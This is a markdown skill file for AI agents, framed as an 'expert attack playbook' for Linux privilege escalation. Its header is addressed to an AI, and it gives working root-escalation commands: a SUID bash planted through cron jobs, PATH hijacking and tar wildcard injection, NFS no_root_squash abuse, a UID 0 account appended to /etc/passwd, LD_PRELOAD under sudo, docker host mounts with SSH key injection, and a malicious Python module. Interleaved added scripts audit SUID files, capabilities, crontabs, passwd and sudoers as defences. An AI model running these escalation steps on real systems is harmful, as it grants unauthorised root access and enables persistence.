# SKILL: Linux Privilege Escalation — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert Linux privesc techniques. Covers enumeration, SUID/SGID, capabilities, cron abuse, kernel exploits, NFS, writable passwd/shadow, LD_PRELOAD, Docker group, and library hijacking. Base models miss subtle escalation paths via capabilities and combined misconfigurations.
## 0. RELATED ROUTING

Before going deep, consider loading:

- container-escape-techniques when the target is a container and you need to escape to host
- linux-security-bypass when facing restricted shells, AppArmor, SELinux, or seccomp
- linux-lateral-movement after obtaining root for pivoting to adjacent hosts
- kubernetes-pentesting when the host is a Kubernetes node
### Advanced Reference

Also load SUID_CAPABILITIES_TRICKS.md when you need:

- Top 30 SUID binaries with exact exploitation commands (GTFOBins)
- Capability-specific exploitation for each dangerous cap
- Custom SUID binary exploitation methodology

Also load KERNEL_EXPLOITS_CHECKLIST.md when you need:

- Kernel version → exploit mapping table (DirtyPipe, DirtyCow, OverlayFS, etc.)
- Exploit compilation tips and cross-compilation notes
- Kernel exploit stability assessment
## 1. ENUMERATION CHECKLIST

Run these immediately after landing a shell:

### System Info

```bash
uname -a                      # Kernel version
cat /etc/os-release           # Distro and version
cat /proc/version             # Kernel compile info
hostname && id && whoami      # Current context
```

### Sudo & SUID/SGID

```bash
sudo -l                                   # What can we run as root?
find / -perm -4000 -type f 2>/dev/null    # SUID binaries
find / -perm -2000 -type f 2>/dev/null    # SGID binaries
getcap -r / 2>/dev/null                   # Files with capabilities
```

### Cron & Timers

```bash
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
systemctl list-timers --all               # systemd timers
```

### Writable Files & Dirs

```bash
find / -writable -type f 2>/dev/null | grep -v proc
ls -la /etc/passwd /etc/shadow            # Check permissions
find / -perm -o+w -type d 2>/dev/null     # World-writable dirs
```

### Network & Services

```bash
ss -tlnp                                  # Listening services
cat /proc/net/tcp                         # Raw TCP connections
ps aux                                    # Running processes
env                                       # Environment variables (credentials?)
```

### Credential Locations

```bash
cat ~/.bash_history
cat ~/.mysql_history
find / \( -name "*.conf" -o -name "*.cfg" -o -name "*.ini" \) 2>/dev/null | head -30
find / \( -name "id_rsa" -o -name "*.pem" -o -name "*.key" \) 2>/dev/null
```
## 2. SUID/SGID EXPLOITATION
### GTFOBins Methodology

- Find SUID binaries: `find / -perm -4000 -type f 2>/dev/null`
- Cross-reference each with GTFOBins
- Use the "SUID" section specifically — not all binary abuse works with SUID

### Quick-Win SUID Escalations

| Binary | Command |
|---|---|
| (the per-binary rows were not preserved in this copy; SUID_CAPABILITIES_TRICKS.md and GTFOBins carry the commands) | |

### Shared Library Hijacking (SUID Binary)

```bash
ldd /usr/local/bin/suid_binary                                   # Check loaded libraries
strace /usr/local/bin/suid_binary 2>&1 | grep -i "open.*\.so"    # Find load paths
```

If it loads from a writable directory — inject constructor:

```bash
gcc -shared -fPIC -o /writable/path/libevil.so evil.c
```

evil.c: a function marked `__attribute__((constructor))` that calls `setuid(0); system("/bin/bash -p")`

---
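The SUID listing from §1 is a point-in-time snapshot; on the defending side it becomes useful when it is diffed against a known-good baseline, because every payload on this page that ends in `chmod +s /tmp/bash` adds exactly one line to that listing. The script below is an added example written for this page, not code from the original playbook. `snapshot_setuid` and `unsticky_world_writable_dirs` run live; `demo_suid_diff` works on two constructed listings whose only difference is a setuid copy of bash in `/tmp`.

```shell
#!/bin/sh
# Added example (not part of the original playbook): detect newly added
# SUID/SGID files by diffing a snapshot against a known-good baseline, and
# list world-writable directories that lack the sticky bit.

# Print "mode owner path" for every SUID/SGID regular file on local
# filesystems, sorted so the output can be fed straight to comm(1).
# Save this once on a clean host to create the baseline.
snapshot_setuid() {
    find / -xdev \( -perm -4000 -o -perm -2000 \) -type f \
        -printf '%m %u %p\n' 2>/dev/null | sort
}

# Lines present in the current snapshot but absent from the baseline.
# $1 = baseline file, $2 = current snapshot file; both sorted as above.
new_setuid_entries() {
    comm -13 "$1" "$2"
}

# Directories anyone can write to that lack the sticky bit, so any user
# can delete or replace files other users put there (the precondition
# for several cron and PATH tricks in this playbook).
unsticky_world_writable_dirs() {
    find / -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null
}

# Demo on constructed listings (no root needed). The only difference is a
# setuid copy of bash in /tmp, the artefact the cron/NFS payloads leave.
demo_suid_diff() {
    base=$(mktemp); cur=$(mktemp)
    printf '%s\n' '4755 root /usr/bin/passwd' '4755 root /usr/bin/sudo' \
        | sort > "$base"
    printf '%s\n' '4755 root /usr/bin/passwd' '4755 root /usr/bin/sudo' \
                  '4755 root /tmp/bash' | sort > "$cur"
    new_setuid_entries "$base" "$cur"       # prints: 4755 root /tmp/bash
    rm -f "$base" "$cur"
}

# Run the demo only when invoked with --demo, so the file can also be
# sourced for its functions.
if [ "${1:-}" = "--demo" ]; then demo_suid_diff; fi
```

Record the baseline once on a clean host (`snapshot_setuid > /var/lib/suid.baseline`, an arbitrary path chosen here) and run `new_setuid_entries` against a fresh snapshot from a timer; any output at all is a finding worth an alert.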
## 3. CAPABILITIES ABUSE
| Capability | Risk | Exploitation |
|---|---|---|
| cap_setuid | Critical | |
| cap_dac_override | Critical | Read/write any file regardless of permissions |
| cap_dac_read_search | High | Read any file — dump |
| cap_sys_admin | Critical | Mount filesystems, BPF, namespace manipulation |
| cap_sys_ptrace | High | Inject into root processes via ptrace |
| cap_net_raw | Medium | Sniff traffic, ARP spoofing |
| cap_net_bind_service | Low | Bind to privileged ports (<1024) |
| cap_chown | High | Change ownership of any file |

```bash
# Find binaries with capabilities
getcap -r / 2>/dev/null

# Example: python3 with cap_setuid
# /usr/bin/python3 = cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```
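The risk column above only helps if something applies it to live `getcap` output. The classifier below is an added example, not code from the original page: it parses both `getcap` output styles (the older `path = caps+ep` and the newer `path caps=ep`), splits comma-separated capability lists, and rates each capability with the page's table; anything not in that table is reported as Unrated. The three lines in `demo_caps` are constructed sample output, and `/opt/app/bin/server` is a made-up path.

```shell
#!/bin/sh
# Added example (not part of the original playbook): rate each file
# capability found by `getcap -r /` using the risk levels from the table.

# Map one capability name to the table's risk level.
cap_risk() {
    case "$1" in
        cap_setuid|cap_dac_override|cap_sys_admin)   echo Critical ;;
        cap_dac_read_search|cap_sys_ptrace|cap_chown) echo High ;;
        cap_net_raw)                                 echo Medium ;;
        cap_net_bind_service)                        echo Low ;;
        *)                                           echo Unrated ;;
    esac
}

# Read getcap output on stdin and print "RISK capability path", one line
# per capability. Handles "path = cap_a,cap_b+ep" (older libcap) and
# "path cap_a,cap_b=ep" (newer libcap).
classify_getcap() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        case "$line" in
            *' = '*) path=${line%% = *}; caps=${line#* = } ;;
            *)       path=${line%% *};   caps=${line#* } ;;
        esac
        caps=${caps%%[+=]*}          # drop the +ep / =ep flag suffix
        old_ifs=$IFS; IFS=,
        for cap in $caps; do
            printf '%s %s %s\n' "$(cap_risk "$cap")" "$cap" "$path"
        done
        IFS=$old_ifs
    done
}

# Live scan, sorted by risk label so Critical findings come first.
scan_capabilities() {
    getcap -r / 2>/dev/null | classify_getcap | sort
}

# Demo on constructed getcap lines (no getcap binary needed).
demo_caps() {
    printf '%s\n' \
        '/usr/bin/python3 = cap_setuid+ep' \
        '/usr/sbin/tcpdump cap_net_raw,cap_net_admin=eip' \
        '/opt/app/bin/server cap_net_bind_service=ep' \
        | classify_getcap
}

if [ "${1:-}" = "--demo" ]; then demo_caps; fi
```

A Critical line on an interpreter such as `/usr/bin/python3` is the exact condition the example above exploits; the fix is `setcap -r` on the file and a review of why it was granted.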
---

## 4. CRON / TIMER ABUSE
### Writable Cron Scripts

```bash
# Find cron jobs running as root
grep root /etc/crontab
ls -la /etc/cron.d/

# If a root-owned cron runs a script writable by current user:
echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' >> /writable/script.sh
# Wait for cron → /tmp/bash -p
```

### PATH Hijacking in Cron

```bash
# If crontab has: PATH=/home/user:/usr/local/bin:/usr/bin
# And runs:       * * * * * root backup.sh   (without full path)
# Create /home/user/backup.sh:
echo '#!/bin/bash' > /home/user/backup.sh
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /home/user/backup.sh
chmod +x /home/user/backup.sh
```

### Wildcard Injection (tar)

```bash
# If cron runs: tar czf /backup/archive.tar.gz *
# In the target directory, create:
echo 'cp /bin/bash /tmp/bash && chmod +s /tmp/bash' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
# tar interprets filenames as arguments
```

### pspy — Monitor Processes Without Root

```bash
# Upload pspy64 or pspy32 to target
./pspy64
# Watch for cron jobs, services, and background processes
```
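All three cron weaknesses above (a writable script, a command named without a full path while PATH holds a writable directory, and a wildcard handed to tar) are visible from the crontab text plus a stat of the files it names. The auditor below is an added example, not part of the original playbook, written for `/etc/crontab`-format files that carry a user field; `demo_cron_audit` builds a constructed crontab in a temporary directory, with a 0777 bin directory and a 0666 job script standing in for real misconfigurations.

```shell
#!/bin/sh
# Added example (not part of the original playbook): audit a system-format
# crontab for the three weaknesses this section abuses: a job script that
# non-root users can write, a command given without a full path while PATH
# contains a writable directory, and a shell wildcard passed to tar.

# True when the path exists and is group/other writable or not owned by
# root, i.e. an unprivileged user could change what root ends up running.
insecure_perms() {
    [ -e "$1" ] && [ -n "$(find "$1" -maxdepth 0 \
        \( -perm -0002 -o -perm -0020 -o ! -user root \) 2>/dev/null)" ]
}

# Audit one crontab in /etc/crontab format
# ("min hour dom mon dow user command" or "@reboot user command").
# $1 = crontab file. Prints one tagged finding per line.
audit_crontab() {
    file=$1
    set -f                                   # keep "*" fields from globbing
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|'#'*) continue ;;
            PATH=*)
                # Any writable PATH entry lets a user plant a same-named binary.
                old_ifs=$IFS; IFS=:
                for dir in ${line#PATH=}; do
                    if insecure_perms "$dir"; then printf 'HIJACKABLE_PATH %s\n' "$dir"; fi
                done
                IFS=$old_ifs; continue ;;
            [A-Za-z_]*=*) continue ;;        # other environment assignments
        esac
        set -- $line
        case "$1" in
            @*) [ $# -ge 3 ] || continue; user=$2; shift 2 ;;
            *)  [ $# -ge 7 ] || continue; user=$6; shift 6 ;;
        esac
        cmd="$*"
        case "$1" in
            /*) if insecure_perms "$1"; then
                    printf 'WRITABLE %s (run by %s)\n' "$1" "$user"
                fi ;;
            *)  printf 'RELATIVE %s runs "%s" without a full path\n' "$user" "$1" ;;
        esac
        case "$cmd" in
            *' *'*) printf 'WILDCARD %s: %s\n' "$user" "$cmd" ;;
        esac
    done < "$file"
    set +f
}

# Demo on a constructed crontab in a temp dir (no root needed). The
# writable bin dir and the 0666 job script stand in for real misconfigs.
demo_cron_audit() {
    tmp=$(mktemp -d)
    mkdir "$tmp/bin" && chmod 0777 "$tmp/bin"
    printf '#!/bin/sh\necho backup\n' > "$tmp/job.sh" && chmod 0666 "$tmp/job.sh"
    printf '%s\n' \
        '# constructed /etc/crontab for the demo' \
        "PATH=$tmp/bin:/nonexistent/bin" \
        '* * * * * root backup.sh' \
        "0 3 * * * root $tmp/job.sh" \
        '30 2 * * * root tar czf /backup/archive.tar.gz *' > "$tmp/crontab"
    audit_crontab "$tmp/crontab"
    rm -rf "$tmp"
}

if [ "${1:-}" = "--demo" ]; then demo_cron_audit; fi
```

Point `audit_crontab` at `/etc/crontab` and every file in `/etc/cron.d`; per-user crontabs from `crontab -l` have no user field, so the field count in the second `case` would need to drop by one for those.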
---

## 5. NFS NO_ROOT_SQUASH
```bash
# On attacker: check exported shares
showmount -e TARGET_IP

# If no_root_squash is set:
mount -t nfs TARGET_IP:/share /mnt/nfs

# As root on attacker box:
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash

# On target:
/share/bash -p        # root shell
```
---

## 6. WRITABLE /etc/passwd OR /etc/shadow
### Writable /etc/passwd

```bash
# Generate password hash
openssl passwd -1 -salt xyz password123
# → $1$xyz$...hash...

# Append root-equivalent user
echo 'hacker:$1$xyz$hash:0:0::/root:/bin/bash' >> /etc/passwd

# Or replace root's 'x' with generated hash (if no shadow file)
```

### Writable /etc/shadow

```bash
# Generate SHA-512 hash
mkpasswd -m sha-512 password123
# Replace root's hash in /etc/shadow
```
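Each edit this section makes leaves a recognisable trace in the file: an extra UID 0 line, a hash sitting in the passwd password field instead of `x`, or a changed root hash in shadow. The checks below are an added example written for this page, not code from the original; the passwd and shadow contents in the demo functions are constructed, and `$6$salt$constructedhash` is a placeholder, not a real hash.

```shell
#!/bin/sh
# Added example (not part of the original playbook): integrity checks for
# /etc/passwd and /etc/shadow that catch the edits this section describes.

# Accounts with UID 0 other than root (the appended "hacker" entry).
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Accounts whose passwd entry carries a hash instead of "x", which
# bypasses /etc/shadow entirely (the "replace root's x" variant).
inline_hash_accounts() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "" && $2 !~ /^!/ { print $1 }' "$1"
}

# Accounts with an empty password field: no password is asked at all.
passwordless_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Compare root's current shadow hash with a recorded baseline.
# $1 = shadow file, $2 = expected hash. Returns 0 when unchanged.
root_hash_matches() {
    [ "$(awk -F: '$1 == "root" { print $2 }' "$1")" = "$2" ]
}

# Live permission check: both files must be root-owned and not writable
# by group or others, and shadow must not be world-readable.
sensitive_file_perms() {
    find /etc/passwd /etc/shadow -maxdepth 0 \
        \( -perm -0002 -o -perm -0020 -o ! -user root \) 2>/dev/null \
        | sed 's/^/WRITABLE_OR_NOT_ROOT /'
    find /etc/shadow -maxdepth 0 -perm -0004 2>/dev/null \
        | sed 's/^/WORLD_READABLE /'
}

# Demo on constructed passwd content in a temp file (no root needed).
demo_passwd_audit() {
    f=$(mktemp)
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
        'hacker:$1$xyz$hash:0:0::/root:/bin/bash' \
        'svc::1001:1001::/home/svc:/bin/bash' > "$f"
    uid0_accounts "$f"         | sed 's/^/UID0 /'
    inline_hash_accounts "$f"  | sed 's/^/INLINE /'
    passwordless_accounts "$f" | sed 's/^/NOPASS /'
    rm -f "$f"
}

# Demo of the shadow baseline check: returns 0 when the recorded hash is
# accepted and a tampered one is rejected.
demo_shadow_check() {
    f=$(mktemp)
    printf '%s\n' 'root:$6$salt$constructedhash:19000:0:99999:7:::' > "$f"
    root_hash_matches "$f" '$6$salt$constructedhash' && \
        ! root_hash_matches "$f" '$6$salt$tamperedhash'
    rc=$?
    rm -f "$f"
    return $rc
}

if [ "${1:-}" = "--demo" ]; then demo_passwd_audit; fi
```

On a healthy system `uid0_accounts /etc/passwd` and `inline_hash_accounts /etc/passwd` print nothing; a file-integrity tool such as AIDE covers the same ground, but these one-liners are cheap enough to run from a timer alongside the permission check.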
---

## 7. LD_PRELOAD / LD_LIBRARY_PATH WITH SUDO
```bash
# If sudo -l shows: env_keep+=LD_PRELOAD or env_keep+=LD_LIBRARY_PATH
# Compile .so with _init() that calls setresuid(0,0,0) + system("/bin/bash -p")
gcc -fPIC -shared -nostartfiles -o /tmp/pe.so /tmp/pe.c
sudo LD_PRELOAD=/tmp/pe.so /usr/bin/some_allowed_binary
```
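The precondition for the trick above is visible in sudoers itself: an `env_keep` line that lists `LD_PRELOAD` or `LD_LIBRARY_PATH`, or `env_reset` switched off. The scanner below is an added example, not from the original playbook; the sudoers content in `demo_sudoers_audit` is constructed, and `alice` and `/usr/local/bin/backup.sh` are made-up names.

```shell
#!/bin/sh
# Added example (not part of the original playbook): scan a sudoers file
# for the settings that make the LD_PRELOAD/LD_LIBRARY_PATH trick possible
# and for rules that hand out commands without a password.

# $1 = sudoers file. Prints one tagged finding per line; comments are
# ignored so a commented-out env_keep line does not trigger.
audit_sudoers() {
    awk '
        /^[ \t]*#/ { next }
        /^[ \t]*Defaults/ {
            # LD_* kept across env_reset, or env_reset switched off entirely
            if ($0 ~ /env_keep[ \t]*[+]?=[^#]*LD_(PRELOAD|LIBRARY_PATH)/) print "ENV_KEEP_LD " $0
            if ($0 ~ /!env_reset/) print "ENV_RESET_OFF " $0
            next
        }
        /NOPASSWD:/ { print "NOPASSWD " $0 }
        /SETENV:/   { print "SETENV_TAG " $0 }
    ' "$1"
}

# Scan the live configuration (needs read access to the sudoers files).
scan_sudoers() {
    for f in /etc/sudoers /etc/sudoers.d/*; do
        [ -f "$f" ] || continue
        audit_sudoers "$f" | sed "s|^|$f: |"
    done
}

# Demo on constructed sudoers content in a temp file.
demo_sudoers_audit() {
    f=$(mktemp)
    printf '%s\n' \
        'Defaults        env_reset' \
        'Defaults        env_keep += "LD_PRELOAD"' \
        'Defaults:alice  !env_reset' \
        '# Defaults      env_keep += "LD_LIBRARY_PATH"' \
        'root  ALL=(ALL:ALL) ALL' \
        'alice ALL=(ALL) NOPASSWD: /usr/local/bin/backup.sh' > "$f"
    audit_sudoers "$f"
    rm -f "$f"
}

if [ "${1:-}" = "--demo" ]; then demo_sudoers_audit; fi
```

`ENV_KEEP_LD` is the finding that matters for this section: sudo strips `LD_*` variables by default, so the only way the exploit above works is that someone put them back in `env_keep`. The `NOPASSWD` lines are listed because the decision tree in §11 asks the same question about custom scripts.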
---

## 8. DOCKER GROUP → ROOT
```bash
# If current user is in the docker group:
id                                            # check for "docker" in groups

# Mount host filesystem
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Or add SSH key
docker run -v /root:/mnt --rm -it alpine sh -c \
  'echo "ssh-rsa AAAA..." >> /mnt/.ssh/authorized_keys'
```
---

## 9. PYTHON / PERL / RUBY LIBRARY HIJACKING
```bash
# Python: if a root-executed script does "import somelib"
# Check python path order:
python3 -c 'import sys; print("\n".join(sys.path))'

# Place malicious module in writable path that comes first:
cat > /writable/path/somelib.py << 'EOF'
import os
os.system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash")
EOF

# Perl: PERL5LIB / @INC manipulation
# Ruby: RUBYLIB / $LOAD_PATH manipulation
```
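The hijack above needs a writable directory ahead of the real module in the search path, and checking for that is cheap. The script below is an added example, not code from the original playbook: `audit_search_dirs` flags empty or relative entries (they resolve to the current directory) and directories writable by non-root, `scan_interpreter_paths` feeds it python3's `sys.path` plus the `PERL5LIB` and `RUBYLIB` variables, and `demo_search_dirs` uses a constructed list with a world-writable temporary directory. The same check applies to the shared-library load paths from §2.

```shell
#!/bin/sh
# Added example (not part of the original playbook): find entries in an
# interpreter's module search path that an unprivileged user could write
# to, which is the precondition for the somelib.py / PERL5LIB / RUBYLIB
# hijacks described above.

# True when the directory exists and is group/other writable or not
# owned by root.
insecure_dir() {
    [ -d "$1" ] && [ -n "$(find "$1" -maxdepth 0 \
        \( -perm -0002 -o -perm -0020 -o ! -user root \) 2>/dev/null)" ]
}

# Read one path entry per line on stdin. Empty or relative entries mean
# "the current directory", so they are flagged regardless of permissions.
audit_search_dirs() {
    while IFS= read -r d; do
        if [ -z "$d" ] || [ "${d#/}" = "$d" ]; then
            printf 'RELATIVE_ENTRY "%s"\n' "$d"
        elif insecure_dir "$d"; then
            printf 'WRITABLE_ENTRY %s\n' "$d"
        fi
    done
    return 0
}

# Colon-separated lists such as PERL5LIB and RUBYLIB, one entry per line.
split_colon_list() {
    printf '%s\n' "$1" | tr ':' '\n'
}

# sys.path as python3 sees it; for `python3 -c` the first entry is '',
# which audit_search_dirs reports as a relative entry.
python_search_dirs() {
    python3 -c 'import sys; print("\n".join(sys.path))'
}

# Live checks for all three interpreters (the env vars may be unset).
scan_interpreter_paths() {
    if command -v python3 >/dev/null 2>&1; then
        python_search_dirs | audit_search_dirs | sed 's/^/python /'
    fi
    if [ -n "${PERL5LIB:-}" ]; then
        split_colon_list "$PERL5LIB" | audit_search_dirs | sed 's/^/perl /'
    fi
    if [ -n "${RUBYLIB:-}" ]; then
        split_colon_list "$RUBYLIB" | audit_search_dirs | sed 's/^/ruby /'
    fi
}

# Demo on a constructed list: an empty entry, a world-writable temp dir
# and a path that does not exist (silently skipped).
demo_search_dirs() {
    d=$(mktemp -d); chmod 0777 "$d"
    printf '%s\n' '' "$d" '/nonexistent/lib' | audit_search_dirs
    rm -rf "$d"
}

if [ "${1:-}" = "--demo" ]; then demo_search_dirs; fi
```

Run `scan_interpreter_paths` as the account and from the working directory the root cron job or service actually uses, because `sys.path` and the `*LIB` variables differ per user and per invocation; a `RELATIVE_ENTRY` finding for a job that runs in a user-writable directory is as serious as a writable absolute path.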
---

## 10. AUTOMATED TOOLS
| Tool | Purpose | Command |
|---|---|---|
| LinPEAS | Comprehensive enumeration | |
| linux-exploit-suggester | Kernel exploit suggestions | |
| pspy | Monitor processes (no root needed) | |
| LinEnum | Legacy enumeration | |
| GTFOBins | SUID/sudo/capability abuse reference | https://gtfobins.github.io/ |
## 11. PRIVILEGE ESCALATION DECISION TREE

```text
Low-privilege shell obtained
│
├── sudo -l shows entries?
│   ├── GTFOBins match? → exploit directly
│   ├── env_keep has LD_PRELOAD? → LD_PRELOAD hijack (§7)
│   ├── NOPASSWD on custom script? → review script for injection
│   └── (ALL) with password? → check for password reuse/hashes
│
├── SUID/SGID binaries found?
│   ├── Standard binary on GTFOBins? → SUID exploit (§2)
│   ├── Custom binary? → reverse engineer, check libs (strace/ltrace)
│   └── Shared lib from writable path? → library hijack (§2)
│
├── Capabilities on binaries?
│   ├── cap_setuid? → instant root (§3)
│   ├── cap_dac_override? → write /etc/passwd (§6)
│   ├── cap_sys_admin? → mount / namespace tricks
│   └── cap_sys_ptrace? → process injection
│
├── Cron jobs running as root?
│   ├── Writable script? → inject payload (§4)
│   ├── Missing full path? → PATH hijack (§4)
│   └── Uses wildcards? → wildcard injection (§4)
│
├── Writable sensitive files?
│   ├── /etc/passwd writable? → add root user (§6)
│   ├── /etc/shadow writable? → replace root hash (§6)
│   └── systemd unit files writable? → add ExecStartPre
│
├── Docker/LXD group membership?
│   └── Yes → mount host filesystem (§8)
│
├── NFS shares with no_root_squash?
│   └── Yes → SUID binary via NFS (§5)
│
├── Kernel version old/unpatched?
│   └── Check KERNEL_EXPLOITS_CHECKLIST.md
│
└── None of the above?
    ├── Run LinPEAS for comprehensive scan
    ├── Check for password reuse (bash_history, config files)
    ├── Check internal services (127.0.0.1 listeners)
    └── Monitor processes with pspy for hidden opportunities
```